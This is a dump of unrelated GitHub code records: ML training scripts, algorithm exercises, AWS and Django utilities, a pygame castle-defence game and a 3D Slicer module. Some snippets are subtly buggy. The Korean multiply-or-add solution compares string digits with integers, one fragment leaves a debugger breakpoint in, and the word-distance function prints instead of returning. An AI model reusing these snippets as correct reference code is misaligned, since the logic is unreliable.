+ \"/event_prior.json\"\n with open(fpath, \"r\") as jf:\n self.priors = json.load(jf) # direct probabilities, not log\n\n # make probabilities into torch tensors and logs\n # first arrange them in right order (0, 1...) and as a tensor\n self.priors = torch.tensor([self.priors[str(j)] for j in range(len(self.priors))])\n self.priors = torch.log(self.priors)\n\n def visualize(self):\n # tensor, y_names, x_names, out_name\n y_names = [str(k) for k in range(1, self.data_likelihood.shape[0]+1)] # segment inidices\n x_names = [str(e) for e in range(self.priors.shape[0])]\n out_name = \"dataLL_\" + self.scenario\n import pdb; pdb.set_trace()\n\n ConfusionMatrixHeatMap(self.data_likelihood, y_names, x_names, out_name)\n\n\ngetll = GetLoglikelihood(scenario=\"library\")\n","repo_name":"izaskr/a3_iza","sub_path":"inscript_lm/score_sentences.py","file_name":"score_sentences.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42090640702","text":"'''\n문제 : 곱하기 혹은 더하기\n\n문제 해설 : 일반적으로 특정한 두 수에 대하여 연산을 수행할 때, 대부분은 '+'보다는 'x'가 더 값을 크게 만든다.\n 하지만 두 수 중에서 하나라도 '0' 혹은 '1'인 경우, 곱하기보다는 더하기를 수행하는 것이 효율적이다.\n 즉, 두 수에 대하여 연산을 수행할 때, 두 수 중에서 하나라도 1 이하인 경우에는 더하며, 두 수가 모두 2 이상인\n 경우에는 곱하면 된다.\n'''\n\ns = input()\n\nresult = 0\nfor i in s:\n if i in (0,1) or result in (0,1): # 현재까지의 계산 결과가 1 이하이거나, 현재 처리하고 있는 숫자가 1 이하라면 더하기\n result += int(i)\n else: # 아니라면 곱하기\n result *= int(i)\n\nprint(result)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"CodingTest/Greedy/solution11.py","file_name":"solution11.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15857655795","text":"\nfrom deep_cnn import DeepCNN\nfrom torch import optim\nfrom torch.nn import functional\nimport testing\nfrom preprocessed_dataloader import *\n\n# Setup: initialize the hyperparameters/variables\nnum_epochs = 10 # Number of full passes through the dataset\nearly_stop_epochs = 10\nbatch_size = 128 # Number of samples in each minibatch\nlearning_rate = 0.001\nseed = np.random.seed(42) # Seed the random number generator for reproducibility\np_test = 0.1 # Percent of the overall dataset to reserve for testing\nnum_folds = 2\nresults_dir = './results/kfold-deep'\n\nif not os.path.exists(results_dir):\n os.makedirs(results_dir)\n\n\n# Check if your system supports CUDA\nuse_cuda = torch.cuda.is_available()\n\n# Setup GPU optimization if CUDA is supported\nif use_cuda:\n computing_device = torch.device(\"cuda\")\n extras = {\"num_workers\": 3, \"pin_memory\": True}\n print(\"CUDA is supported\")\nelse: # Otherwise, train on the CPU\n computing_device = torch.device(\"cpu\")\n extras = False\n print(\"CUDA NOT supported\")\n\n\n\n# Instantiate a DeepCNN to run on the GPU or CPU based on CUDA support\nmodel = DeepCNN()\nmodel = model.to(computing_device)\nprint(\"Model on CUDA?\", next(model.parameters()).is_cuda)\n\n# Use bce with logits for additional numerical stability.\ncriterion = functional.binary_cross_entropy_with_logits\n\n\n# Instantiate the gradient descent optimizer - use Adam optimizer with default parameters\noptimizer = optim.Adam(model.parameters())\n\n\nfor i in range(num_folds):\n trace_file = results_dir + '/trace-' + str(i)\n val_file = results_dir + '/val-' + str(i)\n test_file = results_dir + '/test-' + str(i)\n # Setup the training, validation, and testing dataloaders\n train_loader, val_loader, test_loader = 
processed_split_loaders(batch_size,\n seed,\n p_test=p_test,\n shuffle=True,\n extras=extras)\n # Track the loss across training\n total_loss = []\n avg_minibatch_loss = []\n best_params = None\n\n # Begin training procedure\n for epoch in range(num_epochs):\n\n N = 50\n N_minibatch_loss = 0.0\n current_best_val = 10000000.0\n increasing_epochs = 0\n\n # Get the next minibatch of images, labels for training\n torch.cuda.empty_cache()\n for minibatch_count, (images, labels) in enumerate(train_loader, 0):\n\n # Put the minibatch data in CUDA Tensors and run on the GPU if supported\n images, labels = images.to(computing_device), labels.to(computing_device)\n\n # Zero out the stored gradient (buffer) from the previous iteration\n optimizer.zero_grad()\n\n # Perform the forward pass through the network and compute the loss\n outputs = model(images)\n loss = criterion(outputs, labels)\n\n # Automagically compute the gradients and backpropagate the loss through the network\n loss.backward()\n\n # Update the weights\n optimizer.step()\n\n # Add this iteration's loss to the total_loss\n total_loss.append(loss.item())\n N_minibatch_loss += float(loss)\n\n if minibatch_count % N == 0 and minibatch_count != 0:\n # Print the loss averaged over the last N mini-batches\n N_minibatch_loss /= N\n with open(trace_file, 'a+') as f:\n f.write(str(epoch + 1) + ',' + str(minibatch_count) + ',' +\n str(N_minibatch_loss) + '\\n')\n\n # Add the averaged loss over N minibatches and reset the counter\n avg_minibatch_loss.append(N_minibatch_loss)\n N_minibatch_loss = 0.0\n\n # validate every 4 N minibatches. as validation more expensive now.\n if minibatch_count % (4 * N) == 0 and minibatch_count != 0:\n\n # validation\n total_val_loss, avg_val_loss, accuracy, precision, recall, balance, \\\n conf = testing.test(\n model,\n computing_device,\n val_loader,\n criterion)\n if total_val_loss < current_best_val:\n current_best_val = total_val_loss\n best_params = model.state_dict()\n increasing_epochs = 0\n else:\n increasing_epochs += 1\n with open(val_file, 'a+') as f1:\n f1.write(str(total_val_loss) + ',' + str(avg_val_loss) + ',' + str(accuracy)\n + ',' + str(precision) + ',' + str(recall) + ',' + str(balance)\n + '\\n')\n torch.save(conf, val_file + '-conf' + str(epoch) + '-' + str(minibatch_count))\n if increasing_epochs > early_stop_epochs:\n break\n\n if best_params is not None:\n model.load_state_dict(best_params)\n # test\n total_test_loss, avg_test_loss, tacc, tpr, tre, tbal, tconf= testing.test(model,\n computing_device,\n test_loader, criterion)\n\n with open(test_file, 'a+') as f2:\n f2.write(str(epoch) + ',' + str(total_loss) + ',' + str(avg_minibatch_loss) + ',' +\n str(total_test_loss) + ',' + str(avg_test_loss) + ',' + str(tacc) + ',' + str(tpr)\n + ',' + str(tre) + ',' + str(tbal) + '\\n')\n torch.save(tconf, test_file + '-test-conf')\n\n","repo_name":"rogermilroy/190_PA3","sub_path":"k_fold_train.py","file_name":"k_fold_train.py","file_ext":"py","file_size_in_byte":5727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7015631178","text":"import awswrangler as wr \nimport boto3\nfrom io import StringIO \n\n\ndf = wr.athena.read_sql_query(sql=\"SELECT * FROM \", database=\"\")\n\n# copy to csv\n\nsession = boto3.Session(profile_name=\"red\")\ns3_res = session.resource('s3')\n\ncsv_buffer = StringIO()\n\ndf.to_csv(csv_buffer)\n\nbucket_name = 'stackvidhya'\n\ns3_object_name = 'df.csv'\n\n\ns3_res.Object(bucket_name, 
s3_object_name).put(Body=csv_buffer.getvalue())\n\nprint(\"Dataframe is saved as CSV in S3 bucket.\")\n\n","repo_name":"python3boto3/python-on-aws-databases","sub_path":"py-awswrangler-athena-to-df.py","file_name":"py-awswrangler-athena-to-df.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"27869224121","text":"\"\"\"\nCheck Permutation: Given two strings write a method to decide if one is a permutation of the other\n\"\"\"\n\n# Approach - 1: sort both the strings and check for equality.\n# Time complexity - O(n log n) for the sorts, where n is the len of the largest string;\n# sorted() builds new lists, so space is O(n) rather than O(1)\n\ndef checkPermutation(a,b):\n    return sorted(a) == sorted(b)\n\nassert checkPermutation(\"abc\",\"bac\") is True\nassert checkPermutation(\"aab\",\"ab\") is False\n","repo_name":"malay95/ctci","sub_path":"1. Arrays And Strings/1.2-ChechPermutation.py","file_name":"1.2-ChechPermutation.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"73454867627","text":"\"\"\"\nThis script implements the gradient descent algorithm that is used\nto optimize functions and find their local minima. In this example,\nthe algorithm is demonstrated on linear regression.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\n\ndef data_generation():\n    \"\"\"\n    This function downloads the data and standardizes it\n    using built in functions from sklearn.\n    \"\"\" \n    hitters = pd.read_csv('https://raw.githubusercontent.com/selva86/datasets/master/Hitters.csv', sep=',', header=0)\n    hitters=hitters.dropna()\n\n    X=hitters.drop('Salary',axis=1)\n    X=pd.get_dummies(X,drop_first=True)\n    y=hitters.Salary\n\n    X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)\n\n    scaler = preprocessing.StandardScaler().fit(X_train)\n    X_train = scaler.transform(X_train)\n    X_test = scaler.transform(X_test)\n    scaler = preprocessing.StandardScaler().fit(y_train.values.reshape(-1, 1))\n    y_train = scaler.transform(y_train.values.reshape(-1, 1)).reshape((-1))\n    y_test = scaler.transform(y_test.values.reshape(-1, 1)).reshape((-1))\n\n\n    X_train = preprocessing.add_dummy_feature(X_train)\n    X_test = preprocessing.add_dummy_feature(X_test)\n\n    return X_train, X_test, y_train, y_test\n\ndef objective_function(X, y, beta):\n    \"\"\"\n    This function implements the objective function (mean squared error)\n    for linear regression. Beta contains the coefficients.\n    \"\"\"\n    # return a scalar loss; the original returned the raw residual vector\n    return np.mean(np.square(np.subtract(y, np.dot(X, beta))))\n    \n\ndef gradient_of_function(X, y, beta):\n    \"\"\"\n    This function computes the gradient of the mean-squared-error\n    objective that we implemented above.\n    \"\"\"\n    # grad of mean((y - X beta)^2) is -2/n * X^T (y - X beta); the sign matters,\n    # since graddescent subtracts this value from beta\n    return (-2.0 / len(y)) * np.dot(X.T, np.subtract(y, np.dot(X, beta)))\n\ndef graddescent(t,max_iter,X,y):\n    \"\"\"\n    This function implements the gradient descent algorithm. 
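At each iteration it steps\n    against the gradient with a fixed step size t, beta <- beta - t * grad F(beta),\n    for max_iter iterations. 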
It \n uses the objective_function() and gradient_of_function() \n functions which implement the objective function and its \n gradient respectfully.\n\n Args:\n max_iter(int): The maximum number of iterations that the algorithm \n should run for.\n X(array): The predictor variables, in the form of an array\n y(array): The target variables\n \n Returns:\n beta(array): The values of beta that yield the lowest objective function value\n obj_vals(array): The value of the objective function at each iteration\n\n \"\"\"\n beta = np.zeros(X.shape[1])\n grad_b = gradient_of_function(X, y, beta)\n iter = 0\n obj_vals = []\n while iter < max_iter:\n beta = np.subtract(beta,t*grad_b)\n obj_vals.append(objective_function(X, y, beta))\n grad_b = gradient_of_function(X, y, beta)\n iter += 1\n return np.array(beta), obj_vals\n\ndef main():\n X_train, X_test, y_train, y_test = data_generation()\n betas, objs = graddescent(0.1,100, X_train, y_train)\n plt.plot(objs)\n plt.title(\"Objective function value by iteration\")\n plt.xlabel(\"iterations (t)\")\n plt.ylabel(r'$F(\\beta)$')\n\nif __name__ == '__main__':\n main() ","repo_name":"tejasmhos/Gradient-Descent-Algorithm","sub_path":"gradient_descent.py","file_name":"gradient_descent.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25475705157","text":"from rest_framework import serializers, pagination\n\nfrom .models import Post, Category, Tag\n\n\n# 写入文章数据的接口\nclass PostWriteSerializer(serializers.ModelSerializer):\n class Meta:\n model = Post\n fields = ['id', 'title', 'category', 'tag', 'owner', 'content', 'created_time']\n\n\nclass PostSerializer(serializers.ModelSerializer):\n category = serializers.SlugRelatedField(\n read_only=True,\n slug_field='name',\n )\n tag = serializers.SlugRelatedField(\n read_only=True,\n many=True,\n slug_field='name',\n )\n owner = serializers.SlugRelatedField(\n read_only=True,\n slug_field='username',\n )\n created_time = serializers.DateTimeField(format=\"%Y-%m-%d %H:%M:%S\")\n url = serializers.HyperlinkedIdentityField(view_name='api-post-detail')\n\n class Meta:\n model = Post\n fields = ['id', 'url', 'title', 'category', 'tag', 'owner', 'created_time']\n # extra_kwargs = {\n # 'url': {'view_name': 'api-post-detail'}\n # }\n\n\n# 获取文章详情的serializer\nclass PostDetailSerializer(PostSerializer):\n class Meta:\n model = Post\n fields = ['id', 'title', 'category', 'tag', 'owner', 'content_html', 'created_time']\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n url = serializers.HyperlinkedIdentityField(view_name='api-category-detail')\n\n class Meta:\n model = Category\n fields = ['id', 'url', 'name', 'created_time']\n\n\n# 获取每个分类下的文章数据的serializer\nclass CategoryDetailSerializer(CategorySerializer):\n posts = serializers.SerializerMethodField('paginated_posts')\n\n def paginated_posts(self, obj):\n posts = obj.post_set.filter(status=Post.STATUS_NORMAL)\n paginator = pagination.PageNumberPagination()\n page = paginator.paginate_queryset(posts, self.context['request'])\n serializer = PostSerializer(page, many=True, context={'request': self.context['request']})\n return {\n 'count': posts.count(),\n 'results': serializer.data,\n 'previous': paginator.get_previous_link(),\n 'next': paginator.get_next_link(),\n }\n\n class Meta:\n model = Category\n fields = (\n 'id', 'name', 'created_time', 'posts',\n )\n\n\nclass TagSerializer(serializers.ModelSerializer):\n url = 
serializers.HyperlinkedIdentityField(view_name='api-tag-detail')\n\n class Meta:\n model = Tag\n fields = ['id', 'url', 'name', 'created_time']\n\n\n# 配置获取该tag下所有文章的serializer\nclass TagDeatilSerializer(TagSerializer):\n posts = serializers.SerializerMethodField('paginated_posts')\n\n def paginated_posts(self, obj):\n posts = obj.post_set.filter(status=Post.STATUS_NORMAL)\n paginator = pagination.PageNumberPagination()\n page = paginator.paginate_queryset(posts, self.context['request'])\n serializer = PostSerializer(page, many=True, context={'request': self.context['request']})\n return {\n 'count': posts.count(),\n 'results': serializer.data,\n 'previous': paginator.get_previous_link(),\n 'next': paginator.get_next_link(),\n }\n\n class Meta:\n model = Tag\n fields = (\n 'id', 'name', 'created_time', 'posts',\n )\n","repo_name":"FreshManzzzzz/typeidea","sub_path":"typeidea/blog/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39723545618","text":"import os\nimport json\nimport csv\n\nCOLUMNS = ['name', 'type', 'lang']\nMESSAGE_LIMIT = 5000\n\nmax_message_count = 0\nall_conversations = []\n\nfor i, inbox in enumerate(os.listdir('messages/inbox')):\n\n # get static data like name and start of conversation\n with open('messages/inbox/%s/message_1.json' % inbox ) as f:\n conversation = json.loads(f.read())\n\n # skip if group conversation\n if(len(conversation['participants']) > 2):\n continue\n\n name = conversation['title']\n clean_name = name.encode('ascii', 'ignore').decode()\n\n # skip if non ascii name\n if(len(clean_name) == 0):\n continue\n\n conv_arr = [clean_name, 'collegue', 'eng']\n\n # aggregate exchanged messages\n count = 0\n for messages in os.listdir('messages/inbox/%s' % inbox):\n\n\n\n # skip if not json\n if messages.split('.')[-1] != 'json':\n continue\n\n with open('messages/inbox/%s/%s' % (inbox, messages)) as f:\n conversation = json.loads(f.read())\n\n for message in conversation['messages']:\n\n if count > MESSAGE_LIMIT:\n break\n\n if(message['type'] != 'Generic'):\n continue\n\n if 'content' not in message:\n continue\n \n content = message['content'].encode('ascii', 'ignore').decode()\n content = content.replace(\"\\n\", \"\")\n content = content.replace(\"\\r\", \"\")\n\n if(len(content) == 0):\n continue\n\n conv_arr.append(content)\n count = count + 1\n\n all_conversations.append(conv_arr)\n if count > max_message_count:\n max_message_count = count\n\nmessage_columns = []\nfor num in range(max_message_count):\n message_columns.append('m' + str(num))\nall_columns = COLUMNS + message_columns\n\n\nwith open(\"conversations.csv\", \"w\", newline = '\\n') as output_file:\n writer = csv.writer(output_file)\n writer.writerow(COLUMNS + message_columns)\n writer.writerows(all_conversations)\n\n\n","repo_name":"zuberek/facenet","sub_path":"scripts/process_conversations.py","file_name":"process_conversations.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24970469195","text":"from records import Record, RecordImpl, PBSParseException\nfrom fields import StringField, IntField, DateField, LongDateField, FillerField\nfrom utils import assertEquals\n\nclass DeliveryRecord(RecordImpl):\n Record.registerRecordType(2, lambda line: DeliveryRecord(line))\n\n _recordType = [Record.DELIVERY_START]\n\n def __init__(self,line=\"\"):\n 
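# Field layout below reads as (label, position, length) into the fixed-width PBS line (a convention inferred from the Field constructors, not from PBS documentation), e.g. deliveryType would occupy columns 16-19.\n        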
self.update_fields(dict (\n dataSupplCVR = IntField (\"Data Supplier CVR\", 5, 8).hide(),\n systemCode = StringField (\"System code\", 13,3).hide(),\n deliveryType = IntField (\"Delivery type\",16,4),\n deliveryId = IntField (\"Delivery ID\",20,10),\n filler1 = FillerField (\" \", 30, 19),\n createdDate = DateField (\"Creation date\", 49),\n filler2 = FillerField (\" \", 55, 73)\n ) )\n\n self.recordType = 2\n self.systemCode = \"BS1\"\n\n RecordImpl.__init__(self,line)\n\n self._sections = []\n self.control_amount = 0\n self.control_payload_record_count = 0\n\n def sections(self):\n return self._sections\n\n def sections_payload_count_type(self, type):\n return sum( [ sec.payload_count_type(type) for sec in self._sections ] )\n\n def section_count(self):\n return len(self._sections)\n\n def append(self, section):\n self._sections.append(section)\n self.control_amount += section.controlAmount\n self.control_payload_record_count += section.payload_count()\n\n def end(self, end_delivery_record):\n self.end_record = end_delivery_record\n\n assertEquals(\"Control payment amount does not match\",self.end_record.controlAmount, self.control_amount)\n\n assertEquals(\"Control section count does not match\",self.end_record.numberOfSections, self.section_count())\n\n assertEquals(\"Control number of payment records does not match\",\n self.end_record.numberOfPaymentRecords,\n self.sections_payload_count_type(42))\n\n assertEquals(\"Control number of auxiliary records does not match\",\n self.end_record.numberOfAuxiliaryRecords, \n self.sections_payload_count_type(52) + self.sections_payload_count_type(62))\n\n assertEquals(\"Control number of debtor info records does not match\",\n self.end_record.numberOfDebtorInfoRecords, \n self.sections_payload_count_type(22))\n\n\nclass DeliveryEndRecord(RecordImpl):\n Record.registerRecordType(992, lambda line: DeliveryEndRecord(line))\n\n _recordType = [Record.DELIVERY_END]\n\n def __init__(self,line=\"\"):\n self.update_fields(dict (\n dataSupplCVR = IntField (\"Data Supplier CVR\", 5, 8),\n systemCode = StringField (\"System code\", 13,3),\n deliveryType = IntField (\"Delivery type\",16,4),\n numberOfSections = IntField (\"Number of Sections\",20,11),\n numberOfPaymentRecords = IntField(\"Number of payment records\", 31,11),\n controlAmount = IntField(\"Payload amount\", 42,15), \n numberOfAuxiliaryRecords = IntField(\"Number of aux. 
records\", 57,11),\n filler3 = FillerField (\"0\", 68, 15),\n numberOfDebtorInfoRecords = IntField(\"Number of Payload records\", 83,11),\n filler4 = FillerField (\"0\", 95, 34)\n ) )\n\n self.recordType = 992\n self.systemCode = \"BS1\"\n\n RecordImpl.__init__(self,line)\n\n","repo_name":"mseebach/PBS-parser","sub_path":"lib/deliveryrecords.py","file_name":"deliveryrecords.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"27745798755","text":"from typing import List\n\n\ndef shortest_word_distance(wordsDict: List[str], word1: str, word2: str):\n '''\n Given an array of strings wordsDict and two different strings that already exist in the array word1 and word2,\n return the shortest distance between these two words in the list\n >>> shortest_word_distance([\"practice\", \"makes\", \"perfect\", \"coding\", \"makes\"], \"coding\", \"practice\")\n 3\n >>> shortest_word_distance([\"practice\", \"makes\", \"perfect\", \"coding\", \"makes\"], \"makes\", \"coding\")\n 1\n >>> shortest_word_distance([\"a\", \"a\", \"b\", \"b\"], \"a\", \"b\")\n 1\n '''\n idx1 = -1\n idx2 = -1\n shortest_distance = len(wordsDict)\n for idx, word in enumerate(wordsDict):\n if word == word1:\n idx1 = idx\n if word == word2:\n idx2 = idx\n if idx1 >= 0 and idx2 >= 0:\n if abs(idx1 - idx2) < shortest_distance:\n shortest_distance = abs(idx1 - idx2)\n print(shortest_distance)\n","repo_name":"gvu0110/coding-challenges","sub_path":"python/shortest_word_distance.py","file_name":"shortest_word_distance.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16151220873","text":"import pygame\nimport math\nfrom enemy import Enemy\n\npygame.init()\n\n# ----------Game window setup\n\nscreen_width = 1920\nscreen_height = 1080\n\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption('The Castle Never Break')\n\nclock = pygame.time.Clock()\nfps = 30\n\n#----clouds iterator\n\nc_i = 0\n\n#-----------Colors\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\n\n# ----------Assets\n\n#----Castle\n\n#bg_comp = pygame.image.load('assets/grassy mountains parallax background/Grassy_Mountains_preview_fullcolor.png').convert_alpha()\nbg_layer1 = pygame.image.load('assets/grassy mountains parallax background/layers/clouds_front.png').convert_alpha()\nbg_layer2 = pygame.image.load('assets/grassy mountains parallax background/layers/clouds_mid.png').convert_alpha()\nbg_layer3 = pygame.image.load('assets/grassy mountains parallax background/layers/far_mountains.png').convert_alpha()\nbg_layer4 = pygame.image.load('assets/grassy mountains parallax background/layers/grassy_mountains.png').convert_alpha()\nbg_layer5 = pygame.image.load('assets/grassy mountains parallax background/layers/hill.png').convert_alpha()\nbg_layer6 = pygame.image.load('assets/grassy mountains parallax background/layers/sky.png').convert_alpha()\n\nBg2 = pygame.transform.scale(bg_layer2, (screen_width, screen_height))\nBg3 = pygame.transform.scale(bg_layer3, (screen_width, screen_height))\nBg4 = pygame.transform.scale(bg_layer4, (screen_width, screen_height))\nBg5 = pygame.transform.scale(bg_layer5, (screen_width, screen_height))\nBg6 = pygame.transform.scale(bg_layer6, (screen_width, screen_height))\n\nBg_front = pygame.transform.scale(bg_layer1, (screen_width, screen_height))\nbg_layer2 = pygame.transform.scale(bg_layer2, (screen_width, 
screen_height))\nbg_layer3 = pygame.transform.scale(bg_layer3, (screen_width, screen_height))\nbg_layer4 = pygame.transform.scale(bg_layer4, (screen_width, screen_height))\nbg_layer5 = pygame.transform.scale(bg_layer5, (screen_width, screen_height))\nbg_layer6 = pygame.transform.scale(bg_layer6, (screen_width, screen_height))\n\nBg_front.set_alpha(128) # \"change opacity\"\n\ncastle_healthy = pygame.image.load('assets/castle/png/Asset 24.png').convert_alpha()\n# castle_breaking = pygame.image.load('assets/castle/png/Asset 22.png').convert_alpha()\n# castle_fully_destroyed = pygame.image.load('assets/castle/png/Asset 23.png').convert_alpha()\n\n#----Cannon\n\nbullet_asset = pygame.image.load('assets/cannon/shoot2.png').convert_alpha()\nb_w = bullet_asset.get_width()\nb_h = bullet_asset.get_height()\nbullet_asset = pygame.transform.scale(bullet_asset, (int(b_w * 1.5), int(b_h * 1.5)))\n\n#----Enemys\n\nenemy_animations = []\nenemy_types = ['skeleton']\nenemy_health = [100]\n\nanimation_types = ['walk', 'attack', 'death']\n\nfor enemy in enemy_types:\n\n #load animation\n animation_list = []\n for animation in animation_types:\n\n ##reset sprites list\n\n temp_list = []\n\n #define number of frames\n num_of_frames = 6\n for f_i in range(num_of_frames):\n assets = pygame.image.load(f'assets/monsters/{enemy}/{animation}/{f_i}.png').convert_alpha()\n e_w = assets.get_width()\n e_h = assets.get_height()\n assets = pygame.transform.scale(assets, (int(e_w * 2), int(e_h * 2)))\n temp_list.append(assets)\n animation_list.append(temp_list)\n enemy_animations.append(animation_list)\n\n# ----------Class\n\n#----Castle\n\nclass Castle():\n def __init__(self, cas_100, x, y, scale):\n self.health = 999\n self.max_health = self.health\n self.fired = False\n width = cas_100.get_width()\n height = cas_100.get_height()\n\n self.cas_100 = pygame.transform.scale(cas_100, (int(width * scale), int(height * scale)))\n self.rect = self.cas_100.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n def shoot(self):\n pos = pygame.mouse.get_pos()\n x_dist = pos[0] - self.rect.midleft[0]\n y_dist = -(pos[1] - self.rect.midleft[1])\n self.angle = math.degrees(math.atan2(y_dist, x_dist))\n\n#---Get mouse clicks\n if pygame.mouse.get_pressed()[0] and self.fired == False:\n self.fired = True\n bullet2 = Bullet(bullet_asset, self.rect.midleft[0], self.rect.midleft[1], self.angle)\n bullet_comp.add(bullet2)\n #pygame.draw.line(screen, BLACK, (self.rect.midleft[0], self.rect.midleft[1]), (pos))\n\n if pygame.mouse.get_pressed()[0] == False:\n self.fired = False\n\n\n def draw(self):\n self.image = self.cas_100\n screen.blit(self.image, self.rect)\n\n#----Bullets\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, image, x, y, angle):\n pygame.sprite.Sprite.__init__(self)\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.angle = math.radians(angle)\n self.speed = 10\n self.dx = math.cos(self.angle) * self.speed\n self.dy = -(math.sin(self.angle) * self.speed)\n\n def update(self):\n #----Bullets gone out the sceen\n if self.rect.right < 0 or self.rect.left > screen_width or self.rect.bottom < 0 or self.rect.top > screen_height:\n self.kill()\n\n self.rect.x += self.dx\n self.rect.y += self.dy\n\ncas_comp = Castle(castle_healthy, screen_width - 310, screen_height - 350, 0.3)\n\nbullet_comp = pygame.sprite.Group()\nenemy_comp = pygame.sprite.Group()\n\n#create enemies\n\n\nenemy_1 = Enemy(enemy_health[0], enemy_animations[0], 200, screen_height - 220, 
1)\nenemy_comp.add(enemy_1)\n\n#----------Game loop\n\nrun = True\nwhile run:\n    clock.tick(fps)\n\n#----------Draw Assets\n\n    c_i += 0.1\n    screen.blit(bg_layer6, (0, 0))\n    screen.blit(bg_layer2, (0, 0))\n    screen.blit(bg_layer3, (0, 0))\n    screen.blit(bg_layer4, (0, 0))\n    screen.blit(bg_layer5, (0, 0))\n\n    cas_comp.draw()\n    cas_comp.shoot()\n\n    bullet_comp.update()\n    bullet_comp.draw(screen)\n\n    # draw enemies\n    enemy_comp.update(screen, cas_comp, bullet_comp)\n\n    screen.blit(Bg_front, (-960 + c_i, 0))\n    screen.blit(Bg_front, (960 + c_i, 0))\n    screen.blit(Bg_front, (2880 + c_i, 0))\n\n# print(bullet_comp)\n# print(c_i) #clouds iterator needs to be polished\n\n#----------event handler\n\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            run = False\n\n#----------Update display\n\n    pygame.display.update()\n\npygame.quit()\n","repo_name":"casote/Castle-Never-Break","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"10445348896","text":"\"\"\" This is Step 4. The user selects a ROI and subtracts the two images.\n\tMuch of this step is copied from ChangeTracker, located at \n\thttps://github.com/fedorov/ChangeTrackerPy. This step can be\n\texcessively slow, and at one point crashed Slicer; more investigation\n\tis needed.\n\"\"\"\n\nfrom __main__ import qt, ctk, slicer\n\nfrom BeersSingleStep import *\nfrom Helper import *\nimport PythonQt\nimport vtk\n# provides ScriptedLoadableModuleLogic, subclassed by VolumeClipWithModelLogic below\nfrom slicer.ScriptedLoadableModule import *\n\n\"\"\" ROIStep inherits from BeersSingleStep, which itself inherits\n\tfrom a ctk workflow class. PythonQt is required for this step\n\tin order to get the ROI selector widget.\n\"\"\"\n\nclass ROIStep( BeersSingleStep ) :\n\n\tdef __init__( self, stepid ):\n\n\t\t\"\"\" This method creates a drop-down menu that includes the whole step.\n\t\tThe description also acts as a tooltip for the button. There may be \n\t\tsome way to override this. The initialize method is inherited\n\t\tfrom ctk.\n\t\t\"\"\"\n\n\t\tself.initialize( stepid )\n\t\tself.setName( '4. Define ROI' )\n\t\tself.setDescription( 'Select a region of interest, either with a pre-defined ROI or with the interactive tools below.' )\n\n\t\tself.__logic = VolumeClipWithModelLogic()\n\t\tself.__parameterNode = None\n\t\tself.__parameterNodeObserver = None\n\t\tself.__clippingMarkupNode = None\n\t\tself.__clippingMarkupNodeObserver = None\n\n\t\tself.__parent = super( ROIStep, self )\n\n\t\tself.__vrDisplayNode = None\n\n\t\tself.__roiTransformNode = None\n\t\tself.__baselineVolume = None\n\n\t\tself.__roi = None\n\t\tself.__roiObserverTag = None\n\n\t\tself.__CubicROI = False\n\t\tself.__ConvexROI = True\n\n\tdef createUserInterface( self ):\n\n\t\t\"\"\" This UI allows you to either select a predefined ROI via the \n\t\t\tvtkMRMLAnnotationROINode feature, or to specify your own using\n\t\t\tPythonQt's qMRMLAnnotationROIWidget. That creates a fairly large\n\t\t\tbox with 3 sliders to adjust your ROI in three dimensions. There is\n\t\t\t
There is\n\t\t\talso a ROI drow-down selector for those who have a pre-loaded ROI.\n\t\t\"\"\"\n\n\t\tself.__layout = self.__parent.createUserInterface()\n\n\t\tModelCollapisbleButton = ctk.ctkCollapsibleButton()\n\t\tModelCollapisbleButton.text = \"Curved ROI:\"\n\t\tself.__layout.addWidget(ModelCollapisbleButton)\n\t\tModelFormLayout = qt.QFormLayout(ModelCollapisbleButton)\n\n\t\tself.__clippingModelSelector = slicer.qMRMLNodeComboBox()\n\t\tself.__clippingModelSelector.nodeTypes = ((\"vtkMRMLModelNode\"), \"\")\n\t\tself.__clippingModelSelector.addEnabled = True\n\t\tself.__clippingModelSelector.removeEnabled = False\n\t\tself.__clippingModelSelector.noneEnabled = True\n\t\tself.__clippingModelSelector.showHidden = False\n\t\tself.__clippingModelSelector.renameEnabled = True\n\t\tself.__clippingModelSelector.selectNodeUponCreation = True\n\t\tself.__clippingModelSelector.showChildNodeTypes = False\n\t\tself.__clippingModelSelector.setMRMLScene(slicer.mrmlScene)\n\t\tself.__clippingModelSelector.setToolTip(\"Choose the clipping surface model.\")\n\t\tModelFormLayout.addRow(\"Curved 